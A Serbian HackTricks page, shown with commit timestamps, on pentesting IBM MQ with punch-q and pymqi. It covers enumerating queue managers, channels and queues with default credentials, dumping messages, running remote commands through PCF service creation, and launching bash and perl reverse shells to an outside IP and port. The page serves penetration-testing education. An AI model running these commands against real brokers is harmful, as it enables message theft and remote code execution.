2023-10-11 23:08:45 +00:00
# 1414 - Pentesting IBM MQ
< details >
2024-02-10 13:11:20 +00:00
< summary > < strong > Naučite hakovanje AWS-a od nule do heroja sa< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
* Da li radite u **cybersecurity kompaniji** ? Želite li da vidite **vašu kompaniju reklamiranu na HackTricks** ? Ili želite da imate pristup **najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF formatu** ? Proverite [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Otkrijte [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), našu kolekciju ekskluzivnih [**NFT-ova** ](https://opensea.io/collection/the-peass-family )
* Nabavite [**zvanični PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* **Pridružite se** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord grupi** ](https://discord.gg/hRep4RUj7f ) ili [**telegram grupi** ](https://t.me/peass ) ili me **pratite** na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na [hacktricks repo ](https://github.com/carlospolop/hacktricks ) i [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**.
2023-10-11 23:08:45 +00:00
< / details >
2024-02-10 13:11:20 +00:00
## Osnovne informacije
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
IBM MQ je IBM tehnologija za upravljanje redovima poruka. Kao i druge tehnologije **message broker-a** , posvećena je primanju, skladištenju, obradi i klasifikaciji informacija između proizvođača i potrošača.
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Prema podrazumevanim podešavanjima, **izlaže IBM MQ TCP port 1414** .
Ponekad, HTTP REST API može biti izložen na portu **9443** .
Metrike (Prometheus) takođe mogu biti pristupljene preko TCP porta **9157** .
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
IBM pruža obimnu tehničku dokumentaciju dostupnu na [https://www.ibm.com/docs/en/ibm-mq ](https://www.ibm.com/docs/en/ibm-mq ).
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
## Alati
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Predloženi alat za jednostavno iskorišćavanje je ** [punch-q ](https://github.com/sensepost/punch-q )**, sa korišćenjem Docker-a. Alat aktivno koristi Python biblioteku `pymqi` .
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Za ručniji pristup, koristite Python biblioteku ** [pymqi ](https://github.com/dsuch/pymqi )**. Potrebne su [IBM MQ zavisnosti ](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc ).
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
### Instalacija pymqi
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Potrebno je instalirati i učitati **IBM MQ zavisnosti** :
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
1. Kreirajte nalog (IBMid) na [https://login.ibm.com/ ](https://login.ibm.com/ ).
2. Preuzmite IBM MQ biblioteke sa [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc ](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc ). Za Linux x86_64 to je **9.0.0.4-IBM-MQC-LinuxX64.tar.gz** .
3. Dekompresujte (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
4. Pokrenite `sudo ./mqlicense.sh` da biste prihvatili uslove licenci.
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
>Ako koristite Kali Linux, izmenite fajl `mqlicense.sh` : uklonite/komentarišite sledeće linije (između linija 105-110):
2023-10-11 23:08:45 +00:00
>
>```bash
2024-02-10 13:11:20 +00:00
>if [ ${BUILD_PLATFORM} != `uname` _`uname ${UNAME_FLAG}` ]
> then
2023-10-11 23:08:45 +00:00
> echo "ERROR: This package is incompatible with this system"
> echo " This package was built for ${BUILD_PLATFORM}"
> exit 1
>fi
>```
2024-02-10 13:11:20 +00:00
5. Instalirajte ove pakete:
2023-10-11 23:08:45 +00:00
```bash
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
```
2024-02-10 13:11:20 +00:00
6. Zatim, privremeno dodajte `.so` datoteke u LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64` , **pre** pokretanja drugih alata koji koriste ove zavisnosti.
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Zatim možete klonirati projekat [**pymqi** ](https://github.com/dsuch/pymqi ): on sadrži zanimljive delove koda, konstante, ... Ili možete direktno instalirati biblioteku sa: `pip install pymqi` .
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
### Korišćenje punch-q
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
#### Sa Dockerom
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Jednostavno koristite: `sudo docker run --rm -ti leonjza/punch-q` .
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
#### Bez Dockera
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Klonirajte projekat [**punch-q** ](https://github.com/sensepost/punch-q ) zatim pratite uputstva za instalaciju (`pip install -r requirements.txt && python3 setup.py install`).
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Nakon toga, može se koristiti sa `punch-q` komandom.
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
## Enumeracija
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Možete pokušati da nabrojite **ime upravljača redom, korisnike, kanale i redove** sa **punch-q** ili **pymqi** .
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
### Upravljač redom
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Ponekad, ne postoji zaštita protiv dobijanja imena upravljača redom:
2023-10-11 23:08:45 +00:00
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
```
2024-02-10 13:11:20 +00:00
### Kanali
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
**punch-q** koristi internu (izmenjivu) listu reči da bi pronašao postojeće kanale. Primer korišćenja:
2023-10-11 23:08:45 +00:00
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
```
2024-02-10 13:11:20 +00:00
Dešava se da neki IBM MQ instanci prihvataju **neautentifikovane** MQ zahteve, pa `--username / --password` nije potreban. Naravno, pristupna prava takođe mogu da variraju.
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Čim dobijemo jedno ime kanala (ovde: `DEV.ADMIN.SVRCONN` ), možemo nabrojati sve ostale kanale.
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Nabrojavanje se može obaviti sa ovim delom koda `code/examples/dis_channels.py` iz **pymqi** biblioteke:
2023-10-11 23:08:45 +00:00
```python
import logging
import pymqi
logging.basicConfig(level=logging.INFO)
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
prefix = '*'
args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
2024-02-10 13:11:20 +00:00
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
2023-10-11 23:08:45 +00:00
except pymqi.MQMIError as e:
2024-02-10 13:11:20 +00:00
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s` ' % prefix)
2023-10-11 23:08:45 +00:00
else:
2024-02-10 13:11:20 +00:00
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s` ' % channel_name)
2023-10-11 23:08:45 +00:00
qmgr.disconnect()
```
2024-02-10 13:11:20 +00:00
... Ali **punch-q** takođe uključuje tu opciju (sa više informacija!).
Može se pokrenuti sa:
2023-10-11 23:08:45 +00:00
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...
| Name | Type | MCA UID | Conn Name | Xmit Queue | Description | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN | Server-connection | | | | | |
| DEV.APP.SVRCONN | Server-connection | app | | | | |
| SYSTEM.AUTO.RECEIVER | Receiver | | | | Auto-defined by | |
| SYSTEM.AUTO.SVRCONN | Server-connection | | | | Auto-defined by | |
| SYSTEM.DEF.AMQP | AMQP | | | | | |
| SYSTEM.DEF.CLUSRCVR | Cluster-receiver | | | | | |
| SYSTEM.DEF.CLUSSDR | Cluster-sender | | | | | |
| SYSTEM.DEF.RECEIVER | Receiver | | | | | |
| SYSTEM.DEF.REQUESTER | Requester | | | | | |
| SYSTEM.DEF.SENDER | Sender | | | | | |
| SYSTEM.DEF.SERVER | Server | | | | | |
| SYSTEM.DEF.SVRCONN | Server-connection | | | | | |
| SYSTEM.DEF.CLNTCONN | Client-connection | | | | | |
```
2024-02-10 13:11:20 +00:00
### Redovi
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Postoji odlomak koda sa **pymqi** (`dis_queues.py`), ali **punch-q** omogućava dobijanje više informacija o redovima:
2023-10-11 23:08:45 +00:00
```bash
2024-02-10 13:11:20 +00:00
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
2023-10-11 23:08:45 +00:00
Showing queues with prefix: "*"...
| Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description |
| | | | | | GR Name | eue Nam | |
| | | | | | | e | |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local | Normal | 0 | | | |
| 0 18.35.1 | E | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.1 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.2 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.3 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
# Truncated
```
## Exploit
2024-02-10 13:11:20 +00:00
### Dumpiranje poruka
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Možete ciljati red(ove)/kanal(e) kako biste ih špijunirali i dumpovali poruke iz njih (operacija bez uništavanja). *Primeri:*
2023-10-11 23:08:45 +00:00
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
```
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
```
2024-02-10 13:11:20 +00:00
**Nemojte se ustručavati da iterirate kroz sve identifikovane redove.**
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
### Izvršenje koda
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
> Neke detalje pre nego što nastavimo: IBM MQ se može kontrolisati na više načina: MQSC, PCF, Control Command. Neke opšte liste mogu se pronaći u [IBM MQ dokumentaciji](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison).
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmable Command Formats***) je ono na čemu se fokusiramo kako bismo interaktovali udaljeno sa instancom. **punch-q** i dalje **pymqi** se baziraju na PCF interakcijama.
2023-10-11 23:08:45 +00:00
>
2024-02-10 13:11:20 +00:00
> Možete pronaći listu PCF komandi:
> * [Iz PCF dokumentacije](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), i
> * [iz konstanti](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes).
>
> Jedna interesantna komanda je `MQCMD_CREATE_SERVICE` i njena dokumentacija je dostupna [ovde](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). Kao argument, uzima `StartCommand` koji pokazuje na lokalni program na instanci (primer: `/bin/sh`).
>
> Takođe postoji upozorenje o ovoj komandi u dokumentaciji: *"Pažnja: Ova komanda omogućava korisniku da pokrene proizvoljnu komandu sa mqm ovlašćenjem. Ako su dodeljena prava za korišćenje ove komande, zlonameran ili nepažljiv korisnik može definisati servis koji oštećuje vaš sistem ili podatke, na primer, brisanjem bitnih fajlova."*
>
> *Napomena: uvek prema IBM MQ dokumentaciji (Administrativni referentni materijal), takođe postoji HTTP endpoint na `/admin/action/qmgr/{qmgrName}/mqsc` za pokretanje ekvivalentne MQSC komande za kreiranje servisa (`DEFINE SERVICE`). Ovaj aspekt još uvek nije obuhvaćen ovde.*
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Kreiranje / brisanje servisa sa PCF za izvršavanje udaljenog programa može se obaviti pomoću **punch-q** :
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
**Primer 1**
2023-10-11 23:08:45 +00:00
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
```
2024-02-10 13:11:20 +00:00
> U zapisima IBM MQ-a možete pročitati da je komanda uspešno izvršena:
>
2023-10-11 23:08:45 +00:00
> ```bash
2024-02-10 13:11:20 +00:00
> 2023-10-10T19:13:01.713Z AMQ5030I: Komanda '808544aa7fc94c48' je pokrenuta. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
2023-10-11 23:08:45 +00:00
> ```
2024-02-10 13:11:20 +00:00
Takođe možete nabrojati postojeće programe na mašini (ovde `/bin/doesnotexist` ... ne postoji):
2023-10-11 23:08:45 +00:00
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
2023-10-12 11:52:24 +00:00
s "whatever"
2023-10-11 23:08:45 +00:00
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436
Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done
```
2024-02-10 13:11:20 +00:00
**Imajte na umu da je pokretanje programa asinhrono. Dakle, potrebna vam je druga stavka da biste iskoristili ranjivost** ** *(slušalica za obrnutu ljusku, kreiranje datoteke na drugoj usluzi, eksfiltracija podataka putem mreže...)***
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
**Primer 2**
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Za jednostavnu obrnutu ljusku, **punch-q** takođe nudi dva payloada za obrnutu ljusku:
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
* Jedan sa bashom
* Jedan sa perlom
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
*Naravno, možete napraviti prilagođeni payload pomoću komande `execute` .*
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Za bash:
2023-10-11 23:08:45 +00:00
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
2024-02-10 13:11:20 +00:00
Za perl:
2023-10-11 23:08:45 +00:00
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
2024-02-10 13:11:20 +00:00
### Prilagođeni PCF
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Možete istražiti IBM MQ dokumentaciju i direktno koristiti **pymqi** Python biblioteku da biste testirali određenu PCF komandu koja nije implementirana u **punch-q** .
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
**Primer:**
2023-10-11 23:08:45 +00:00
```python
import pymqi
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
2024-02-10 13:11:20 +00:00
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
2023-10-11 23:08:45 +00:00
except pymqi.MQMIError as e:
2024-02-10 13:11:20 +00:00
print("Error")
2023-10-11 23:08:45 +00:00
else:
2024-02-10 13:11:20 +00:00
# Process response
2023-10-11 23:08:45 +00:00
qmgr.disconnect()
```
2024-02-10 13:11:20 +00:00
Ako ne možete pronaći imena konstanti, možete se referisati na [IBM MQ dokumentaciju ](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors ).
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
> *Primer za [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Decimalno = 73). Potrebno je koristiti parametar `MQCA_CLUSTER_NAME` (Decimalno = 2029) koji može biti `*` (Dokumentacija: ):*
>
2023-10-11 23:08:45 +00:00
> ```python
> import pymqi
2024-02-10 13:11:20 +00:00
>
2023-10-11 23:08:45 +00:00
> queue_manager = 'MYQUEUEMGR'
> channel = 'DEV.ADMIN.SVRCONN'
> host = '172.17.0.2'
> port = '1414'
> conn_info = '%s(%s)' % (host, port)
> user = 'admin'
> password = 'passw0rd'
2024-02-10 13:11:20 +00:00
>
2023-10-11 23:08:45 +00:00
> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
> pcf = pymqi.PCFExecute(qmgr)
2024-02-10 13:11:20 +00:00
>
2023-10-11 23:08:45 +00:00
> try:
> args = {2029: "*"}
> response = pcf.MQCMD_REFRESH_CLUSTER(args)
> except pymqi.MQMIError as e:
> print("Error")
> else:
> print(response)
2024-02-10 13:11:20 +00:00
>
2023-10-11 23:08:45 +00:00
> qmgr.disconnect()
> ```
2024-02-10 13:11:20 +00:00
## Testno okruženje
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
Ako želite testirati ponašanje i eksploatacije IBM MQ, možete postaviti lokalno okruženje zasnovano na Dockeru:
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
1. Imajte nalog na ibm.com i cloud.ibm.com.
2. Kreirajte kontejnerizovani IBM MQ sa:
2023-10-11 23:08:45 +00:00
```bash
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
```
2024-02-10 13:11:20 +00:00
Podrazumevano, autentifikacija je omogućena, korisničko ime je `admin` , a lozinka je `passw0rd` (promenljiva okruženja `MQ_ADMIN_PASSWORD` ).
Ovde je ime menadžera redova postavljeno na `MYQUEUEMGR` (promenljiva `MQ_QMGR_NAME` ).
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
IBM MQ treba da bude pokrenut i da ima otvorene portove.
2023-10-11 23:08:45 +00:00
```bash
❯ sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
```
2024-02-10 13:11:20 +00:00
> Stare verzije IBM MQ Docker slika se nalaze na: https://hub.docker.com/r/ibmcom/mq/.
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
## Reference
2023-10-11 23:08:45 +00:00
2024-02-10 13:11:20 +00:00
* [mgeeky's gist - "Praktični napomene za testiranje prodiranja IBM MQ" ](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec )
2023-10-11 23:08:45 +00:00
* [MQ Jumping - DEFCON 15 ](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf )
2024-02-10 13:11:20 +00:00
* [IBM MQ dokumentacija ](https://www.ibm.com/docs/en/ibm-mq )